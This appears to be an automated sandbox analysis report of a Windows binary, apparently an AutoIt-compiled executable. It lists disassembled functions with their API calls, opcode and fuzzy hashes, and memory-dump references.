Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 7beda06c568656abdcfa0fd0d7a86d18d9fa7cd2388b4ef8e202364418bf7880
Instruction ID: b5c704a6e3607dcdb1db7c8415cba712ab7a18c18fd82aca5c4d63e639af177b
Opcode Fuzzy Hash: 7beda06c568656abdcfa0fd0d7a86d18d9fa7cd2388b4ef8e202364418bf7880
Instruction Fuzzy Hash: 19112373502E15AECB212F74AE49FDF3BC89F103A1F14652DF918BA250DE3299829680

Function 00E944A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00E944CF

Part of subcall function 00E9407C: _memset.LIBCMT ref: 00E940FC
Part of subcall function 00E9407C: _wcscpy.LIBCMT ref: 00E94150
Part of subcall function 00E9407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00E94160

KillTimer.USER32(?,00000001,?,?), ref: 00E94524
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00E94533
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00ECD4B9

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: e3078a4a5a7e7c7c59127479210eadfb3c12ae5d5b8b79aabfc42b7f579e424e
Instruction ID: fee20566cfd267af0fae13894627a47f28453c98c5a747069d94cfe46abf7958
Opcode Fuzzy Hash: e3078a4a5a7e7c7c59127479210eadfb3c12ae5d5b8b79aabfc42b7f579e424e
Instruction Fuzzy Hash: 4621F8B05087989FEB32CB648C55FE6BBECAF01318F04109DE79E66181C3762985D741

Function 00F06369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00E95A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00EF7896,?,?,00000000), ref: 00E95A2C
Part of subcall function 00E95A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00EF7896,?,?,00000000,?,?), ref: 00E95A50

gethostbyname.WSOCK32(?,?,?), ref: 00F06399
WSAGetLastError.WSOCK32(00000000), ref: 00F063A4
_memmove.LIBCMT ref: 00F063D1
inet_ntoa.WSOCK32(?), ref: 00F063DC

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: e3d4df670d328abac31c7596b0c17299409f5b337ac3104d2879e53552722022
Instruction ID: 5b23210aa7cbff6bc59254e0ed6dc42a5220df70db0b0cdb24e3fb02ddc640ec
Opcode Fuzzy Hash: e3d4df670d328abac31c7596b0c17299409f5b337ac3104d2879e53552722022
Instruction Fuzzy Hash: 6E115E72900109AFCF05FBA4DD46DEEB7F8AF04320B144065F505B72A2DB31AE14EBA1

Function 00EE8B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00EE8B61
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00EE8B73
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00EE8B89
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00EE8BA4

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: bd92b7c0d90416fcdc7eb8514043151f77bd1a4e457dd529b7ab1af2486f56ec
Instruction ID: c5bb863d3272a28ac0f29e75251875891fcf7d5332f2905f6d7d0f6a55ccfb5e
Opcode Fuzzy Hash: bd92b7c0d90416fcdc7eb8514043151f77bd1a4e457dd529b7ab1af2486f56ec
Instruction Fuzzy Hash: 1A111879901218FFEB11DFA5CD85FADBBB8FB48710F2040A5EA04B7290DA716E11DB94

Function 00E91290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 00E92612: GetWindowLongW.USER32(?,000000EB), ref: 00E92623

DefDlgProcW.USER32(?,00000020,?), ref: 00E912D8
GetClientRect.USER32(?,?), ref: 00ECB5FB
GetCursorPos.USER32(?), ref: 00ECB605
ScreenToClient.USER32(?,?), ref: 00ECB610

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 999817acdad1700b06f1bc6639711232706ff60c5d8671e71bfc82b90ced8406
Instruction ID: 2ffe8e4733751cb5e97490ae0bb84cffe32067354137e203064a141122f0bc62
Opcode Fuzzy Hash: 999817acdad1700b06f1bc6639711232706ff60c5d8671e71bfc82b90ced8406
Instruction Fuzzy Hash: A6113A3550011EEFCF00EF98D9859EE77B9EB05301F4044A5FA01E7151C730BA55ABA5

Function 00EED831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00EED84D
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00EED864
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00EED879
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00EED897

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: ea36a2532ae4cb1e05b64570964cabb46d35e35bbd407403f4322bf528d95f4f
Instruction ID: e945cde10a3bde687ec992cf00308e120448a65348f25a494c06d4dae4821941
Opcode Fuzzy Hash: ea36a2532ae4cb1e05b64570964cabb46d35e35bbd407403f4322bf528d95f4f
Instruction Fuzzy Hash: 801161B5609358EBE324CF52DC08FD3BBBCEB00B00F108569A956E6050D7B1E549ABA5

Function 00EC6FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00EC6FDB

Part of subcall function 00EC76C2: __fltout2.LIBCMT ref: 00EC76EB

__cftog_l.LIBCMT ref: 00EC7001
__cftoe_l.LIBCMT ref: 00EC7033

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: eb2e149be5aa4a53589296b8411cc2b5ac37f2ed52ebf9b80e452edbe1291d50
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: 82017E3204414ABBCF125E84CD02DEE3F62BB18394B489419FE9868131C637C9B2AF81

Function 00F1B2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00F1B2E4
ScreenToClient.USER32(?,?), ref: 00F1B2FC
ScreenToClient.USER32(?,?), ref: 00F1B320
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00F1B33B

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: 5e254ec88ecfdbb8960e76318c30d5867a7853ee6dc34b5d04ef8110ac930426
Instruction ID: 7b9c9a4c7410b507d1b44fe27766d13f0e6991759b565570469879c6716f0d23
Opcode Fuzzy Hash: 5e254ec88ecfdbb8960e76318c30d5867a7853ee6dc34b5d04ef8110ac930426
Instruction Fuzzy Hash: 311143B9D0020DEFDB41CFA9C8849EEBBB9FB18310F108166E914E3220D735AA659F50

Function 00F1B635 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F1B644
_memset.LIBCMT ref: 00F1B653
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00F56F20,00F56F64), ref: 00F1B682
CloseHandle.KERNEL32 ref: 00F1B694

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID:
API String ID: 3277943733-0
Opcode ID: d42184e5363a8fd184fdb24d84e8e76522111ca600d9e9b92a8eed19d208cebd
Instruction ID: 1cb6c59b29190c7356bbb2af5fd288a866895bbaa38c5341cf8851e2255b2818
Opcode Fuzzy Hash: d42184e5363a8fd184fdb24d84e8e76522111ca600d9e9b92a8eed19d208cebd
Instruction Fuzzy Hash: F2F054B19403087AE61027617C05FBB3ADCEB04356F404420BB19E6192E7714C00A7A8

Function 00EF6BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 00EF6BE6

Part of subcall function 00EF76C4: _memset.LIBCMT ref: 00EF76F9

_memmove.LIBCMT ref: 00EF6C09
_memset.LIBCMT ref: 00EF6C16
LeaveCriticalSection.KERNEL32(?), ref: 00EF6C26

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: 0e09ed69716a83df53ab321dda7543e43b640437a7a774f90a90870066be8167
Instruction ID: d6e7a112c6472593338b2cb1fdda18a66c013b3c58e3342cab35a9f40973334e
Opcode Fuzzy Hash: 0e09ed69716a83df53ab321dda7543e43b640437a7a774f90a90870066be8167
Instruction Fuzzy Hash: 8FF05E7A200104ABCF016F55EC85A8ABB6AEF45321F04C065FE08AE267C731E811DBB4

Function 00E92218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00E92231
SetTextColor.GDI32(?,000000FF), ref: 00E9223B
SetBkMode.GDI32(?,00000001), ref: 00E92250
GetStockObject.GDI32(00000005), ref: 00E92258
GetWindowDC.USER32(?,00000000), ref: 00ECBE83
GetPixel.GDI32(00000000,00000000,00000000), ref: 00ECBE90
GetPixel.GDI32(00000000,?,00000000), ref: 00ECBEA9
GetPixel.GDI32(00000000,00000000,?), ref: 00ECBEC2
GetPixel.GDI32(00000000,?,?), ref: 00ECBEE2
ReleaseDC.USER32(?,00000000), ref: 00ECBEED

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 39ee6fa1243ac9c5214628f0bbfe9066ae755862d4fba79446426d029f695ec8
Instruction ID: c381f97509c2630c917c59d19180faed1f790aaaf5f17e5172716473749f0e73
Opcode Fuzzy Hash: 39ee6fa1243ac9c5214628f0bbfe9066ae755862d4fba79446426d029f695ec8
Instruction Fuzzy Hash: B7E03932544248FADF215FA4FC0DBD83B11EB05336F15C36AFA69A80E1C7724989EB12

Function 00EE8712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00EE871B
OpenThreadToken.ADVAPI32(00000000,?,?,?,00EE82E6), ref: 00EE8722
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00EE82E6), ref: 00EE872F
OpenProcessToken.ADVAPI32(00000000,?,?,?,00EE82E6), ref: 00EE8736

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 458b5cd19001dfe8cafb8df7cec90bc8163cd6c9de773d3c2125d01abaccdafe
Instruction ID: 4901e8a922cb01505ea6c20850994cafb57222959aaafef1f274201a03be3151
Opcode Fuzzy Hash: 458b5cd19001dfe8cafb8df7cec90bc8163cd6c9de773d3c2125d01abaccdafe
Instruction Fuzzy Hash: F3E086366112159FD7205FB15D0CBDA3BACEF54795F16C828B649D9050DA348449DB50

Function 00EEB2F3 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 00EEB4BE

Strings

AutoIt3GUI, xrefs: 00EEB436
Container, xrefs: 00EEB43B

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: d4b02fb179eb9f4991c3fe7ac5558e21d1c26a0cc6f229c1ff5df6d143cc075a
Instruction ID: e05c428b7d899a066947269c36622e3f9945e6bfdb7ad639db57951d9640506b
Opcode Fuzzy Hash: d4b02fb179eb9f4991c3fe7ac5558e21d1c26a0cc6f229c1ff5df6d143cc075a
Instruction Fuzzy Hash: 4E916970600605AFDB14DF65C884BABBBE9FF48710F20956DE94ADB391DBB0E845CB50

Function 00EFAFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON

Download Yara Rule

APIs

Part of subcall function 00EAFC86: _wcscpy.LIBCMT ref: 00EAFCA9

Part of subcall function 00E99837: __itow.LIBCMT ref: 00E99862
Part of subcall function 00E99837: __swprintf.LIBCMT ref: 00E998AC

__wcsnicmp.LIBCMT ref: 00EFB02D
WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 00EFB0F6

Strings

LPT, xrefs: 00EFB027

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: Connection__itow__swprintf__wcsnicmp_wcscpy
String ID: LPT
API String ID: 3222508074-1350329615
Opcode ID: ce8c6d15276b97a5e8b7d1c4c2c75882cd8556e7138f60c7666d01ac6f4d47a7
Instruction ID: 470dba7fd5a88d553025c01cbb9614d2183cc735c391ddd8aa79d76c7f926a2e
Opcode Fuzzy Hash: ce8c6d15276b97a5e8b7d1c4c2c75882cd8556e7138f60c7666d01ac6f4d47a7
Instruction Fuzzy Hash: 9E615D75A00219EFCB18DF98C891EBEB7F9EB09310F105169FA16BB251DB70AE44CB50

Function 00EA2957 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00000000), ref: 00EA2968
GlobalMemoryStatusEx.KERNEL32(?), ref: 00EA2981

Strings

@, xrefs: 00EA2975

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: GlobalMemorySleepStatus
String ID: @
API String ID: 2783356886-2766056989
Opcode ID: 40252769fd2f7d90b4b3361d6fd1e28b2268a373c6acda58a3236a02e76de5cc
Instruction ID: ae221713793afd4bd0c60d8a6e1536a50c32f5048504f2d98428abd36dd6aca3
Opcode Fuzzy Hash: 40252769fd2f7d90b4b3361d6fd1e28b2268a373c6acda58a3236a02e76de5cc
Instruction Fuzzy Hash: DA516C714187489BD720EF14DC85BAFB7E8FF85350F41885DF2D8510A2EB309929CB56

Function 00EF9734 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON

Download Yara Rule

APIs

Part of subcall function 00E94F0B: __fread_nolock.LIBCMT ref: 00E94F29

_wcscmp.LIBCMT ref: 00EF9824
_wcscmp.LIBCMT ref: 00EF9837

Strings

FILE, xrefs: 00EF9770

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: _wcscmp$__fread_nolock
String ID: FILE
API String ID: 4029003684-3121273764
Opcode ID: 29cf7f8f95ef596de56d61c602c5c48ead40c6da6e6378cdc53f0f5c9fe0af95
Instruction ID: 8806b4bfb39ea1b706b0d3df8eb5c331a29e4fcb2f670daee27eb81907323ca4
Opcode Fuzzy Hash: 29cf7f8f95ef596de56d61c602c5c48ead40c6da6e6378cdc53f0f5c9fe0af95
Instruction Fuzzy Hash: E441B571A0020EBADF259AA4CC46FEFBBFDDF85714F001469FA04B7181DA719A058B61

Function 00F0258E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97networkCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F0259E
InternetCrackUrlW.WININET(?,00000000,00000000,0000007C), ref: 00F025D4

Strings

|, xrefs: 00F025A5

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: CrackInternet_memset
String ID: |
API String ID: 1413715105-2343686810
Opcode ID: 735135ae4e9ed980de8c363d088138159af5f21df069b82d65cd807c66fe541b
Instruction ID: 08c67fef41750160bbc4154f6445f72881df614dfdaf80fcf969e9c655ceb652
Opcode Fuzzy Hash: 735135ae4e9ed980de8c363d088138159af5f21df069b82d65cd807c66fe541b
Instruction Fuzzy Hash: CA310771810119ABCF01EFA1CC89EEEBFB9FF08310F10105AF955B6262EB315956EB60

Function 00F17A71 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 97windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001132,00000000,?), ref: 00F17B61
SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00F17B76

Strings

', xrefs: 00F17ACA

Memory Dump Source

Source File: 00000000.00000002.1604772492.0000000000E91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E90000, based on PE: true

Associated: 00000000.00000002.1604759330.0000000000E90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F1F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1604972278.0000000000F44000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605021998.0000000000F4E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1605064983.0000000000F57000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e90000_J1VpshZJfm.jbxd

Similarity

API ID: MessageSend
String ID: '
API String ID: 3850602802-1997036262
Opcode ID: f2e5dca73aa6aeb500a4ba2cdef077930c26c9279fe90959a2c019f56bf3c88c
Instruction ID: 0da131edf6b085e95fd399b848130ffc5077b2346b77f5ae7b260c62d3c5f9c7
Opcode Fuzzy Hash: f2e5dca73aa6aeb500a4ba2cdef077930c26c9279fe90959a2c019f56bf3c88c
Instruction Fuzzy Hash: F3412874A083099FDB14DF65C890BDABBB5FF08310F10016AE909EB395D730AA81DF90

